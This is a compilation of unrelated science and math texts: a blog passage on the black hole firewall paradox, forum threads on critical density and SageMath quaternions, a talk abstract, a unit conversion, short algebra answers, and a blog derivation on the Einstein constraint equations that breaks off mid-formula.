But because a system can't be maximally entangled with two other systems, there is a paradox and one of the assumptions has to be invalid. AMPS continue by saying that what has to fail is the "emptiness of the black hole" assumption. They make another step and say that all field modes inside the old black hole are hugely excited so an infalling observer gets burned once she crosses the event horizon.
My answer is that the resolution is that $$A$$ and $$R_B$$ aren't really "two other systems"; $$A$$ is a heavily transformed subset of degrees of freedom in $$R_B$$ so $$B$$ is only near-maximally entangled with one system, not two, and everything is fine. I believe that this has been the very point of the black hole complementarity from the beginning.
Yup, I took this picture in Santa Barbara, not far from the KITP.
Now, Joe's objection is the following:
Even Alice must have a state, a pure state or a mixed state, ready to make predictions. Up to $$t=0$$, she describes the early Hawking radiation in the same way as Bob (who stays outside). For example, this wave function may imply that $$N_b=5$$ for an occupation number measured outside the black hole; the state may be an $$N_b=5$$ eigenstate.
It also means that the state is an eigenstate of a (complicated) observable at a later time which evolved from $$N_b$$. On the other hand, this observable doesn't commute with $$N_a$$, the occupation number for a field mode moderately inside the black hole, in the $$A$$ region. The state can't be an $$N_b$$ eigenstate and an $$N_a$$ eigenstate at the same moment because they're generically non-commuting operators, and consequently, it can't be true that $$N_a=0$$ which is needed for the emptiness of the old black hole interior from the viewpoint of an infalling observer.
I don't think so. What is true and what is not about Joe's statements above?
First, let us ask: Will her "later" state be an eigenstate of $$N_a$$ or $$N_b$$? Here, the answer is clear. We assumed the state to be an $$N_b=5$$ eigenstate so by the dynamical equations, the state will remain an eigenstate of an observable that evolved from $$N_b$$ via Heisenberg's equations. For this quantity (probably involving an undoable measurement in practice), the measured value is sharply determined.
To predict the value of another quantity such as $$N_a$$, we need to decompose the state into $$N_a$$ eigenstates and the squared absolute values of the probability amplitudes determine the probabilities of different results. Joe is right that in principle, because the operators $$N_a$$, $$N_b$$, and their commutator are "generic", there will inevitably be a nonzero probability for $$N_a\neq 0$$.
However, Joe isn't right when he suggests that this means a problem. Indeed, the probability of $$N_a\neq 0$$ will be nonzero. Nevertheless, this probability may still be tiny. In other words, the probability that a particular mode will be seen as $$N_a=0$$ may still approach 100 percent so in the classical or semiclassical approximation, quantum gravity will continue to respect the equivalence principle which implies that an observer falling into an old black hole sees no radiation (not even the Unruh one which he would see if he were not freely falling).
And I think that this is what happens. The probability of $$N_a\neq 0$$ is tiny but nonzero. We may try to be somewhat more quantitative.
Choose a basis of the $$\exp(S)$$-dimensional space of the black hole microstates so that the basis vectors are $$N_a$$ eigenstates. Now, my point is that the number of $$N_a=0$$ basis vectors can be and almost certainly is greater (and probably much greater) than the number of $$N_a=1$$ or higher eigenvalue eigenstates. We know how it would work if $$N_a$$ were counting the occupation number from a non-freely-falling, "static" observer's viewpoint.
In that case, the probability of having a greater number of particles (by one) would be suppressed by a factor similar to the Boltzmann factor $$\exp(-\beta E_n)$$ where $$E_n$$ is the energy of the mode and $$\beta$$ is the inverse black hole temperature, comparable to the Schwarzschild radius. In that case, we could prove that the probability of having a higher number of particles (by one) in some spherical harmonic $$Y_{LM}$$ would be suppressed by something like $$e^L$$; I am a bit sketchy here. This is just a description of the Unruh radiation that a "static" observer would experience right outside the black hole.
Things are harder for the freely infalling observer. Classically, she shouldn't see any radiation – because of the equivalence principle – so the higher values of $$N_a$$ should be even more suppressed. The suppression should become "total" for macroscopic black holes.
At the same time, however, the working of the low-energy effective field theory means that in the relevant Hilbert space, the creation operator increasing $$N_a$$ must relate states pretty much in a one-to-one fashion. So how it could be true that the number of $$N_a=1$$ eigenstates in the basis is (much) lower than the number of the $$N_a=0$$ eigenstates?
Before you conclude that my scenario is shown mathematically impossible, don't forget about one thing. If you create a quantum in a quantum field (in the black hole interior) and increase $$N_a$$, you also change the total mass/energy of the black hole from $$M$$ to $$M+E_a$$. So the $$N_a=0$$ states of a lighter black hole are in one-to-one correspondence with the $$N_a=1$$ states of a heavier black hole.
In other words (or using an annihilation operator), the $$N_a=1$$ states of the black hole of a given mass are in one-to-one correspondence with the $$N_a=0$$ states of a lighter black hole whose mass is $$M-E_a$$. But a smaller black hole has a smaller entropy, and therefore a smaller total number of all microstates. The ratio of the number of states is approximately equal to$\frac{ \exp(S_{\rm larger})} {\exp(S_{\rm smaller})} \sim \frac{\exp(M^2)}{\exp[(M-E_a)^a]}\sim\exp(2ME_a G)$ where I restored Newton's constant in the final result. All purely numerical factors are ignored. This result is still the quasi-Boltzmannian $$\exp(C\beta E_a)$$ with some unknown numerical constant $$C$$. Well, the calculation was really more appropriate for a static observer but even for a freely infalling one, it should still be true that the action of a creation operator creates a larger and heavier black hole. In other words, the annihilation operators produce a lighter black hole with fewer states, and therefore the excited states are in one-to-one correspondence with the smaller number of states of a lighter black hole.
Even if the calculation above is wrong despite the tolerance for errors in the numerical factors (if the parameteric dependence is different, and I hope it is), I think it's true that a fixed-mass black hole has fewer eigenstates with $$N_a=1$$ than those with $$N_a=0$$, so it's more likely that we will see empty modes. This likelihood is becoming overwhelming for modes that are sufficiently localized on the event horizon (those proportional to $$Y_{LM}$$ with a larger $$L$$). It means that if you pick a generic state such as the $$N_b=5$$ eigenstate and decompose it to the $$N_a$$ eigenstate basis, most of the terms will still correspond to $$N_a=0$$ which means that there will be a near-certainty that you will measure $$N_a=0$$ even though $$N_a,N_b$$ refuse to commute.
The fact that $$N_a\neq 0$$ may happen shouldn't be shocking. Look at a younger black hole and you will see that the interior can't be quite empty. It takes $${\mathcal O}(r_s)$$ of proper time to suck "most of the material" of the star from which the black hole was created but because some of the material recoils etc., there's a nonzero amount of material inside the black hole at later times, too.
Joe neglects the fact that $$N_a=0$$ is only an approximately valid statement and uses the strict $$N_a=0$$ to derive a paradox. I think that $$N_a=0$$ is just approximate and in fact, it's an interesting challenge to use the laws of quantum gravity – or specific laws in a formulation of string theory – to derive the percentage of states that have $$N_a=1$$, for example. Classically, almost all microstates must correspond to an empty interior (as seen by an infalling observer) because the highest-entropy, dominant microstates are those that (because of the second law of thermodynamics) appear "later" once the black hole is sufficiently stabilized, almost perfectly spherical, and after it has consumed the star material and its echoes. The reason behind $$N_a\approx 0$$ is therefore "entropic".
I don't know what the exact parametric dependence is so most of the formulae above were just "proofs of a concept" but I do think it shows that Polchinski et al. have overlooked a loophole that is arguably more plausible than all the loopholes they have discussed. The loophole says that the emptiness of the black hole interior simply isn't perfect but it is very good for large black holes and localized modes (certainly no deadly firewalls!). The equivalence principle at long distance scales, unitarity, and other assumptions of quantum mechanics and low-energy effective field theory may be preserved when complementarity is allowed to do its job and declare the information inside and outside the black hole as "not quite independent information".
And that's the memo.
|
|
## Intermediate Algebra (6th Edition)
$x=-1$ This is not a function.
$x=-1$ This is not a function. This is a vertical line passing through (-1,0). This graph fails the vertical line test.
|
|
Critical density: question correction
1. Jul 23, 2015
Luminescent
Hope I'm in the right section for this question! In the big bang model, the expansion of the universe is slowed down by gravity. If there is enough matter in the universe, then the expansion can be overcome and the universe will collapse in the future. The density of matter that is just sufficient to eventually halt the expansion is called the critical density. The equation for the critical density is
ρcrit = 3H₀²/ 8πG
You can see that the critical density is proportional to the square of the Hubble constant — a faster expansion requires a higher density to overcome the expansion.
We can calculate ρcrit by inserting the gravitational constant, G = 6.67 × 10-11 Nm2 / kg2, and adopting H0= 70 km/s/Mpc. We first convert the Hubble constant to metric units, H0= 2 × 10-18s-1. Now we can solve to get ρcrit = 3 × (2.1 × 10-18)2 / 8 × 3.14 × 6.7 × 10-11 = 7.9 × 10-27 kg/m3 ≈ 10-26 kg/m3. Equal to about five hydrogen atoms per cubic meter.
With all that being said, can anyone tell me why;
8π x G? Or why 3 × H²?
In other words, I'm looking for an explanation as to why we are using particular numbers like 8π or 3H² to achieve density?
Last edited: Jul 23, 2015
2. Jul 23, 2015
RyanH42
From equations which describes Universe.
Did you know friedmann equation
$H^2-8πGρ/3=-k/a^2(t)+Λc^2/3$
If we assume $k=0$ (Which it is) and $Λ=0$ (We assume $Λ=0$ for simplicity) then we get
$H^2=8πGρ/3$
then $p=3H^2/8πG$
These numbers derived from equations.Einstein Field Equations gives us friedmann equation.And friedmann equation gives us critical density equation
3. Jul 23, 2015
Luminescent
Yes, thank you for your reply, I'm am aware of these calculations. My question can even be related to them if preferred. Question still stands how are the values 8π and 3 relevant to the equations parameters. They are acting as constants in themselves but for what purpose? Where's is the dimensionality in 8π other than to say it undergoes 4 rotations? Relatively so, what is the dimensionality of 3? In other words what are they explaining in the the equation?
4. Jul 23, 2015
Luminescent
I meant to tag you for a response. Here we go
5. Jul 23, 2015
Staff: Mentor
Note that this is only true if the cosmological constant is zero. If it's positive (which, according to our best current model, it is), a critical density universe will still expand forever. In fact, according to our best current model, our universe is at the critical density (if the density of dark energy, i.e., the cosmological constant, is included), and will expand forever.
We're not. We're using them because they are needed to make the equations match reality.
These are dimensionless numbers; they're not there to correct the units of anything. They're there because they have to be there to make the equations match reality.
I'm not sure what you mean. The equation is supposed to describe reality, i.e., to describe the relationship between density and expansion rate (among other things) that we actually observe. But without the $8 \pi$ and the $3$ in there, the equation doesn't correctly describe that relationship.
6. Jul 23, 2015
RyanH42
The derivation of Friedmann equation:
$1/2mV^2-mMG/r=U$
$V^2-2MG/r=2U/m$
$M=4/3πρR^3$, so
$H^2R^2-8πGR^2/3=-k$
$H^2-8πG/3=-k/R^2$
$k=-2U/m$ U=Total energy
This derivation is wrong but It can give you an idea about where this 8,π,G,3 come from.
Or Lets think the other way $p=3H^2/8πG$
$8πG/3=H^2/p$
So these numbers are just constants to make $H^2/p$ same for all time(H and p is time dependet)
7. Jul 23, 2015
Luminescent
Thanks for your replies these are all great answers! Bare with me I'm still highschool level. Although
Very interesting!
Is there any other way physicists can derive critical density without it being derived from the Friedman equations?
Seems to me there must logically be another way to calculate to the density of the universe and arrive with the same value and units...
8. Jul 23, 2015
Staff: Mentor
No.
The actual density of the universe is not the same, conceptually, as the critical density. The actual density is whatever we measure it to be. The critical density is a theoretical quantity that is calculated from the Friedmann equations. Our best measurements indicate that, to within experimental error, the two are numerically the same, but that doesn't make them the same thing. It just means they happen to be equal numerically.
9. Jul 23, 2015
Luminescent
Ahh yes Well noted. Interesting though... There numerical similarity describes what then ? If there separateness lies in their description, then there must be some sort of error in our collective methods and descriptions of such mechanics... Wouldn't you agree?
10. Jul 23, 2015
Staff: Mentor
Um, that the actual density of the universe is the same as the theoretically calculated critical density? I'm not sure what you're trying to ask here.
I don't know because I don't understand what you're asking.
|
|
PIRSA:23020054
# Classical Bulk-Boundary Correspondences via Factorization Algebras
### APA
Rabinovich, E. (2023). Classical Bulk-Boundary Correspondences via Factorization Algebras. Perimeter Institute. https://pirsa.org/23020054
### MLA
Rabinovich, Eugene. Classical Bulk-Boundary Correspondences via Factorization Algebras. Perimeter Institute, Feb. 17, 2023, https://pirsa.org/23020054
### BibTex
@misc{ pirsa_23020054,
doi = {10.48660/23020054},
url = {https://pirsa.org/23020054},
author = {Rabinovich, Eugene},
keywords = {Mathematical physics},
language = {en},
title = {Classical Bulk-Boundary Correspondences via Factorization Algebras},
publisher = {Perimeter Institute},
year = {2023},
month = {feb},
note = {PIRSA:23020054 see, \url{https://pirsa.org}}
}
Collection
Talk Type
Subject
## Abstract
A factorization algebra is a cosheaf-like local-to-global object which is meant to model the structure present in the observables of classical and quantum field theories. In the Batalin-Vilkovisky (BV) formalism, one finds that a factorization algebra of classical observables possesses, in addition to its factorization-algebraic structure, a compatible Poisson bracket of cohomological degree +1. Given a sufficiently nice'' such factorization algebra on a manifold $N$, one may associate to it a factorization algebra on $N\times \mathbb{R}_{\geq 0}$. The aim of the talk is to explain the sense in which the latter factorization algebra knows all the classical data'' of the former. This is the bulk-boundary correspondence of the title. Time permitting, we will describe how such a correspondence appears in the deformation quantization of Poisson manifolds.
|
|
# 94 knots in meters per second
## Conversion
94 knots is equivalent to 48.3577777777778 meters per second.[1]
## Conversion in the opposite direction
The inverse of the conversion factor is that 1 meter per second is equal to 0.0206791967280915 times 94 knots.
It can also be expressed as: 94 knots is equal to $\frac{1}{\mathrm{0.0206791967280915}}$ meters per second.
## Approximation
An approximate numerical result would be: ninety-four knots is about forty-eight point three five meters per second, or alternatively, a meter per second is about zero point zero two times ninety-four knots.
## Footnotes
[1] The precision is 15 significant digits (fourteen digits to the right of the decimal point).
Results may contain small errors due to the use of floating point arithmetic.
|
|
# Quaternions Missing Important Functionality?
I use quaternions and Clifford algebras frequently for solving PDE boundary value problems as well as things like reflections, rotations etc. The underlying field for my quaternions is almost always either the complex numbers or the symbolic ring.
I am making an attempt to use them in Sage but I've run into a couple of obstacles that have given me pause. The absolute first things I looked for were,
1) scalar part or real part of the quaternion. Where is this function? I stumbled upon turning it into a list or vector but I presume that just taking the scalar part would be more efficient than dumping all the coefficients. For matrix representations it's often just the trace of the matrix. Correspondingly obtaining the vector part should be a standard function as well.
2) Quaternion automorphisms and anti-automorphisms? where are they? Yes we have conjugate which is both a method and an external function but what about the reversion and involution and the many other automorphisms? I don't expect to have to multiply by a bunch of unit vectors to get them for efficiency reasons. Also how do I distinguish between the quaternion conjugate and the complex conjugate of each of it's elements? This is a very important distinction that I would not know how to do without stripping out it's components and then remapping it.
3) Constructing a quaternion from coefficients. The only examples I've seen require explicit multiplications like q = q0 + q1 * i + q2 * j + q3 * k . That doesn't seem efficient.
4) quaternions as elements of enclosing matrices and vectors. This would be very helpful since you could generate any Clifford algebra with this and it's often easier to analyze the components of said algebra that are isomorphic to Quaternions or Biquaternions in the complex case. Moreover I need to be able to do this for quaternions over the symbolic ring. It fails for me as this example from sage 7.3 shows:
Q.<e1,e2,e3> = QuaternionAlgebra(SR, -1,-1)
var('x y z', domain='real')
q1 = x + x * I * e1
q2 = x - x * I * e1
v = vector([q1,q2])
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "_sage_input_36.py", line 10, in <module>
exec compile(u'open("___code___.py","w").write("# -*- coding: utf-8 -*-\\n" + _support_.preparse_worksheet_cell(base64.b64decode("US48ZTEsZTIsZTM+ID0gUXVhdGVybmlvbkFsZ2VicmEoU1IsIC0xLC0xKQp2YXIoJ3ggeSB6JywgZG9tYWluPSdyZWFsJykKcTEgPSB4ICsgeCAqIEkgKiBlMQpxMiA9IHggLSB4ICogSSAqIGUxCnYgPSB2ZWN0b3IoW3ExLHEyXSk="),globals())+"\\n"); execfile(os.path.abspath("___code___.py"))
File "", line 1, in <module>
File "/tmp/tmpQ0ibdW/___code___.py", line 7, in <module>
exec compile(u'v = vector([q1,q2]) File "", line 1, in <module>
File "sage/modules/free_module_element.pyx", line 510, in sage.modules.free_module_element.vector (/data/AppData/SageMath/src/build/cythonized/sage/modules/free_module_element.c:5811)
TypeError: unsupported operand type(s) for ** or pow(): 'QuaternionAlgebra_ab' and 'int'
5) quaternion rotations. Most libraries will generate the unit quaternion that rotates in 3D space and/or have a function that applies it efficiently.
There are probably a few other things like generating a canonical matrix ...
edit retag close merge delete
I just want to say this is a really great and well-thought-out question, and I hope someone answers it soon. My guess is that at least some of this really would need new tickets; quaternion stuff in Sage I think is more there for algebraists than e.g. graphics.
( 2016-08-26 06:40:36 -0500 )edit
Sort by » oldest newest most voted
I agree that many quarternion functionalities are missing. Here is simply the answer to the point 3) you have raised: a quaternion can be constructed directly from its coefficients by means of SageMath's standard element instanciation from the parent, i.e. H(...) where H is the quaternion algebra:
sage: H.<i,j,k> = QuaternionAlgebra(SR, -1, -1)
sage: var("t x y z", domain='real')
(t, x, y, z)
sage: q = H((t, x, y, z)); q
t + x*i + y*j + z*k
sage: q.conjugate()
t + (-x)*i + (-y)*j + (-z)*k
sage: q2 = H((2, 0, -3*x^2, 4)); q2
2 + (-3*x^2)*j + 4*k
sage: q2.conjugate()
2 + 3*x^2*j + (-4)*k
The reverse operation is provided by the method coefficient_tuple:
sage: q.coefficient_tuple()
(t, x, y, z)
sage: q2.coefficient_tuple()
(2, 0, -3*x^2, 4)
more
After hacking away at this for a day or so, I can start answering some of my own questions. One reason why I didn't have answers right away is due to the fact that the automatically generated documentation for the quaternions does not cover the methods in the parent class nor does it cover several external functions that still work against the quaternion object.
The other problem is that I am not an algebraist. So for example the fact that the scalar part is actually half the reduced trace was not readily obvious. So here is my take so far on my "issues".
1) Let q be an instance of a quaternion. q.reduced_trace()/2 is the scalar part. But even better is the undocumented fact that the [] operator has been overloaded so that you can simply do q[0]. That latter is a nice feature. Once you have that generating the "vector part" is easy enough.
2) Another undocumented feature is the .C method for matrices and the .conjugate() method which appears to exist for both quaternions and matrices. However it only gives you the quaternion conjugation not the elementwise complex conjugation. The latter has to be added by the programmer as far as I can tell.
As for the other automorphisms like involution and reversion, they would have to be implemented by the programmer as far as I can tell. I suspect the same might be true for the more general Clifford algebras, but I'm not certain.
3) I'm stuck with this for now. Maybe there are undocumented constructors somewhere.
4) Well quaternions can not be elements of a vector, but it can be elements of a matrix! Whoo Hoo! Something like
mat12 = matrix([q1,q2])
will actually create row matrix from two quaternions. Now I can implement the direct sum of two biquaternions, which is the odd degenerate space I have to work with. I guess someone forgot or didn't see the need to implement a _vector_ method.
5) As for rotations I guess we are on our own here. You will have to implement that your self as well as slerp and so forth for the computer graphics guys. I guess reflections or Lorentz transformations and so forth, which are nicely expressed in quaternions would also have to be a user application for now, along with wedge products, inner products and all the other types of multiplication in geometric algebras/clifford algebras.
I have accumulated a few more complaints though as I have continued. First it appears that there is not a lot of support for global substitutions on symbolic quaternions. You can't define quaternion functions symbolically and you can't do global variable substitutions without directly accessing the components. Global differentiation also appears broken.
Another gaping hole for any serious use of these libraries is the complete absence of quaternion transcendental functions. First there is no inverse! Yup quaternion inverse is missing. There is no exponentiation, no logarithm, no powers ...
more
I have run into another major problem with the quaternion package. You can not create functions that map variables to quaternions nor can you do global substitutions of variables. Here is an example, e1 is a quaternion.
~~~~
var('x y', domain='real')
Q.<e1,e2,e3> = QuaternionAlgebra(SR, -1,-1)
q1 = I * x - x * e1
print (q1.subs(x=y))
qfunc(x) = I * x + x * e1
print(qfunc(y))
print(q1[0].subs(x=y))
~~~~
With output:
~~~~
I*x + (-x)*e1
I*x + x*e1
I*y
~~~~
As you can see, only when I extract a coefficient of the quaternion do I get what I expect from a simple substitution.
( 2016-08-26 16:13:11 -0500 )edit
|
|
# Given vectors u=<4,1> & v=<1,3>, how would I determine the quantity 3u*-2v?
$< 10 , - 9 >$
By $u \ast$I assume we mean $\overline{u}$, ie the complex conjugate of the vector u.
In this case, 3 baru-2v=3(4;-1)-2(1;3)
=(12;-3)-(2;6)=(10;-9)
|
|
# Ngô Quốc Anh
## December 10, 2012
### Construction of spacetimes via solutions of the vacuum Einstein constraint equations and the propagation of the gauge condition
Filed under: Riemannian geometry — Tags: — Ngô Quốc Anh @ 23:10
A couple of days ago, we showed that the Einstein equations are essentially hyperbolic under the harmonic gauge. To be precise, the solvability of the equations
$\displaystyle {\overline {{\text{Ric}}}} - \frac{1}{2}\overline g \text{Scal}_{\overline g} +\Lambda \overline g = \kappa\overline T,$
is equivalent to solving the following hyperbolic system
$\displaystyle - \frac{1}{2}{\overline g ^{km}}{\overline g _{ij,km}} = \Psi_{ij}((\overline g_{pq})_{0\leqslant p,q \leqslant n},(\overline g_{pq,r})_{0\leqslant p,q,r \leqslant n}),$
provided $\displaystyle {\lambda ^\alpha } = 0$ for all $\alpha = \overline {0,n}$. Later on, when we consider the Cauchy problem for the Einstein equations on some appropriate framework, the first and second fundamental forms need to verify some constraint equations, [here and here].
By tracing the above equation, we obtain
$\displaystyle \text{Scal}_{\overline g} + \frac{2n}{2 - n}\Lambda = \frac{2\kappa}{2 - n}\text{trace}_{\overline g}(\overline T),$
which helps us to write
$\displaystyle\overline {{\text{Ric}}} = \kappa \left( {\overline T - \frac{\overline g}{{n - 2}}{\text{trace}}_{\overline g}(\overline T )} \right) + \frac{2}{{n - 2}}\Lambda \overline g.$
In the vacuum case, the above equation is nothing but
$\displaystyle {\overline {{\text{Ric}}}}=\frac{2}{{n - 2}}\Lambda \overline g.$
The spacetime $V$ we choose will be the product $M \times [0,+\infty)$. What we really need is to construct a metric $\overline g$ on $V$ such that the Einstein equations fulfill. In fact, thanks to the hyperbolic system showed above, we aim to find a suitable initial condition such that
• The gauge condition can propagate in time;
• The hyperbolic system is solvable for small time $t$.
While the latter is standard (we shall touch this issue later), the former needs to study and this is the main point of this notes.
In this entry, given a solution $(g,K)$ of the constraint equations on a manifold $(M,g)$ of the dimension $n$, we shall construct an appropriate spacetime $(V,\overline g)$ of the dimension $n+1$. Recall that
$\displaystyle\begin{array}{lcl} {\overline {{\text{Ric}}} _{ij}} + \frac{1}{2}({{\overline g}_{\alpha i}}\lambda _{,j}^\alpha + {{\overline g}_{\alpha j}}\lambda _{,i}^\alpha ) &=&- \frac{1}{2}{{\overline g}^{km}}{{\overline g}_{ij,km}} + {\text{lower order terms}} \hfill \\&=& \kappa \left( {{{\overline T}_{ij}} - \frac{1}{{n - 2}}{\text{trac}}{{\text{e}}_{\overline g}}(\overline T){{\overline g}_{ij}}} \right) + \frac{2}{{n - 2}}\Lambda {{\overline g}_{ij}} + \frac{1}{2}({{\overline g}_{\alpha i}}\lambda _{,j}^\alpha + {{\overline g}_{\alpha j}}\lambda _{,i}^\alpha ). \end{array}$
Initially, we set
$\displaystyle\begin{gathered} {\overline g _{ij}} \;\,= {g_{ij}},1 \leqslant i,j \leqslant n, \hfill \\ {\overline g _{00}} \,\,= - 1, \hfill \\ {\overline g _{0j}} \,\,= 0,1 \leqslant j \leqslant n, \hfill \\ {\overline g _{ij,0}} = - 2{K_{ij}},1 \leqslant i,j \leqslant n. \hfill \\ \end{gathered}$
As a consequence of the choice above, we also have $\overline g _{ij,k}$ for non-zero $i,j,k$. To fully construct the initial condition, we still need to find $\overline g_{0j,o}$.
First, in view of the gauge condition, $\displaystyle {\lambda ^\alpha } = {\square _{\overline g }}{x^\alpha } =0$, we find that
$\displaystyle {\lambda ^\alpha } = \frac{1}{{\sqrt {\det \overline g } }}{(\sqrt {\det \overline g } \,{\overline g ^{ij}}x_{,i}^\alpha )_{,j}} = \overline g _{,j}^{\alpha j} + \frac{1}{2}{\overline g ^{\alpha j}}{\overline g ^{pq}}{\overline g _{pq,j}} = 0.$
Therefore, at $t=0$, we get that
$\displaystyle\begin{gathered} {\lambda ^0} = \overline g _{,0}^{00} + \frac{1}{2}{\overline g ^{00}}{\overline g ^{pq}}{\overline g _{pq,0}}, \hfill \\ {\lambda ^\alpha } = \overline g _{,0}^{\alpha 0} + \underbrace {\sum\limits_{j = 1}^n {\left( {\overline g _{,j}^{\alpha j} + \frac{1}{2}{{\overline g }^{\alpha j}}{{\overline g }^{pq}}{{\overline g }_{pq,j}}} \right)} }_{\text{already determined}},1 \leqslant \alpha \leqslant n. \hfill \\ \end{gathered}$
Hence, in order to guarantee that $\lambda^\alpha \equiv 0$ at $t=0$ for all $\alpha=\overline{0,n}$, we first select $\overline g _{,0}^{\alpha 0}$ such that $\lambda^\alpha =0$ at $t=0$. Once this task is done, we can determine $\overline g _{,0}^{00}$ at $t=0$ such that $\lambda^0=0$ at $t=0$.
In other words, the initial data that preserves the gauge condition can be found in this way. Within a small time, the hyperbolic system mentioned above always admits a solution $\overline g$. That is to say that the reduced Einstein equations have solution, i.e.,
$\displaystyle \mathop{\overline {\text{Ric}}}\limits_{(h)}{}^{ij}=\kappa \left( {{{\overline T}^{ij}} - \frac{1}{{n - 2}}{\text{trace}}_{\overline g}(\overline T){{\overline g}^{ij}}} \right)+\frac{2}{{n - 2}}\Lambda \overline g^{ij},$
where the $(0,2)$-tensor $\mathop{\overline {\text{Ric}}}\limits_{(h)}$ is given by
$\displaystyle\mathop{\overline {\text{Ric}}}\limits_{(h)}{}_{ij}={\overline {{\text{Ric}}} _{ij}} + \frac{1}{2}({\overline g _{\alpha i}}\lambda _{,j}^\alpha + {\overline g _{\alpha j}}\lambda _{,i}^\alpha ).$
However, it is not necessary to have that $\overline g$ solves the Einstein equations unless the gauge condition remains valid within the small time. We shall prove this affirmatively.
We now consider how could the gauge condition propagate in time so long as the metric $\overline g$ solves the reduced equations. As we shall see, all $\lambda^\alpha$ satisfy a homogeneous linear wave equation which is a consequence of the Bianchi identities with vanishing initial time derivatives which come from the constraint equations.
First, since the metric $\overline g$ solves
$\displaystyle - \frac{1}{2}{{\overline g}^{km}}{{\overline g}_{ij,km}} + {\text{lower order terms}} = \kappa \left( {{{\overline T}_{ij}} - \frac{1}{{n - 2}}{\text{trace}}_{\overline g}(\overline T){{\overline g}_{ij}}} \right)$
and thanks to the Einstein equation for the $\text{Ric}$ curvature, we immediately have
$\displaystyle {\overline {{\text{Ric}}} _{ij}} + \frac{1}{2}({{\overline g}_{\alpha i}}\lambda _{,j}^\alpha + {{\overline g}_{\alpha j}}\lambda _{,i}^\alpha ) = \frac{2}{{n - 2}}\Lambda {{\overline g}_{ij}}.$
Let us write
$\displaystyle {L_{\alpha \beta }} = \frac{1}{2}{\overline g _{\beta \mu }}{\partial _\alpha }{\lambda ^\mu } + \frac{1}{2}{\overline g _{\alpha \mu }}{\partial _\beta }{\lambda ^\mu }-\frac{2}{{n - 2}}\Lambda {{\overline g}_{\alpha \beta}}.$
Using this, we have
$\displaystyle {\overline {{\text{Ric}}} ^{\alpha \beta }} - \frac{1}{2}{\overline g ^{\alpha \beta }}\text{Scal}_{\overline g} = - ({L^{\alpha \beta }} - \frac{1}{2}{\overline g ^{\alpha \beta }}L),$
where $L$ is the trace of $L^{\alpha\beta}$. Since the Einstein tensor is divergence free, we obtain
$\displaystyle {\nabla _\lambda }({L^{\lambda \mu }} - \frac{1}{2}{g^{\lambda \mu }}L) = 0.$
Keep in mind that $\nabla _\lambda \overline g=0$. A simple calculation shows that
$\displaystyle\begin{gathered} 0 = {\nabla _\lambda }({\overline g ^{\alpha \lambda }}{\overline g ^{\beta \mu }}{L_{\alpha \beta }} - \frac{1}{2}{\overline g ^{\lambda \mu }}{\overline g ^{\alpha \beta }}{L_{\alpha \beta }}) \hfill \\ \,\,\,\,= \frac{1}{2}{\nabla _\lambda } \Big({\overline g ^{\alpha \lambda }}{\overline g ^{\beta \mu }}({\overline g _{\beta \mu }}{\partial _\alpha }{\lambda ^\mu } + {\overline g _{\alpha \mu }}{\partial _\beta }{\lambda ^\mu }) - \frac{1}{2}{\overline g ^{\lambda \mu }}{\overline g ^{\alpha \beta }}({\overline g _{\beta \mu }}{\partial _\alpha }{\lambda ^\mu } + {\overline g _{\alpha \mu }}{\partial _\beta }{\lambda ^\mu }) \Big) \hfill \\ \,\,\,\,= \frac{1}{2}{\overline g ^{\alpha \lambda }}\underbrace {{{\overline g }^{\beta \mu }}{{\overline g }_{\beta \mu }}}_1{\nabla _\lambda }({\partial _\alpha }{\lambda ^\mu }) + \frac{1}{2}{\overline g ^{\beta \mu }}\underbrace {{{\overline g }^{\alpha \lambda }}{g_{\alpha \mu }}}_{\delta _\mu ^\lambda }{\nabla _\lambda }({\partial _\beta }{\lambda ^\mu }) \hfill \\ \qquad- \frac{1}{4}{\overline g ^{\lambda \mu }}\underbrace {{{\overline g }^{\alpha \beta }}{{\overline g }_{\beta \mu }}}_{\delta _\mu ^\alpha }{\nabla _\lambda }({\partial _\alpha }{\lambda ^\mu }) - \frac{1}{4}{\overline g ^{\lambda \mu }}\underbrace {{{\overline g }^{\alpha \beta }}{{\overline g }_{\alpha \mu }}}_{\delta _\mu ^\beta }{\nabla _\lambda }({\partial _\beta }{\lambda ^\mu }) \hfill \\ \,\,\,\,= \frac{1}{2}{\overline g ^{\alpha \lambda }}{\nabla _\lambda }({\partial _\alpha }{\lambda ^\mu }) + \frac{1}{2}{\overline g ^{\beta \mu }}{\nabla _\lambda }({\partial _\beta }{\lambda ^\lambda }) - \frac{1}{2}{\overline g ^{\lambda \mu }}{\nabla _\lambda }({\partial _\beta}{\lambda ^\beta}). \hfill \\ \end{gathered}$
Thanks to
$\displaystyle {\square _{\overline g }} = {\overline g ^{\lambda \alpha}}{\nabla _\lambda }({\partial _\alpha }(\cdot))$
we have proved that
$\displaystyle\frac{1}{2}{\square _{\bar g}}{\lambda ^\mu } + B_{jq}^p(({{\bar g}_{rs}}),({{\bar g}_{rs,l}}))\lambda _{,p}^q = 0.$
The above long calculation also shows that
$\displaystyle\begin{array}{lcl} {\overline {{\text{Ric}}} _{\alpha \beta }} - \frac{1}{2}{\overline g _{\alpha \beta }}{\text{Scal}}_{\overline g} + \Lambda {{\overline g}_{\alpha \beta }} &=&\displaystyle - {L_{\alpha \beta }} + \frac{1}{2}{\overline g _{\alpha \beta }}L + \Lambda {{\overline g}_{\alpha \beta }} \hfill \\&=&\displaystyle - \frac{1}{2}{\overline g _{\beta \mu }}{\partial _\alpha }{\lambda ^\mu } - \frac{1}{2}{\overline g _{\alpha \mu }}{\partial _\beta }{\lambda ^\mu } + \frac{2}{{n - 2}}\Lambda {{\overline g}_{\alpha \beta }} \hfill \\&&\displaystyle + \frac{1}{2}{\overline g _{\alpha \beta }}{\overline g ^{pq}}\left( {\frac{1}{2}{{\overline g }_{q\mu }}{\partial _p}{\lambda ^\mu } + \frac{1}{2}{{\overline g }_{p\mu }}{\partial _q}{\lambda ^\mu } - \frac{2}{{n - 2}}\Lambda {{\overline g}_{pq}}} \right) + \Lambda {{\overline g}_{\alpha \beta }} \hfill \\&=&\displaystyle - \frac{1}{2}{\overline g _{\beta \mu }}{\partial _\alpha }{\lambda ^\mu } - \frac{1}{2}{\overline g _{\alpha \mu }}{\partial _\beta }{\lambda ^\mu } + \frac{2}{{n - 2}}\Lambda {{\overline g}_{\alpha \beta }} \hfill \\&&\displaystyle + \frac{1}{4}{\overline g _{\alpha \beta }}\underbrace {{{\overline g }^{pq}}{{\overline g }_{q\mu }}}_{\delta _\mu ^p}{\partial _p}{\lambda ^\mu } + \frac{1}{4}{\overline g _{\alpha \beta }}\underbrace {{{\overline g 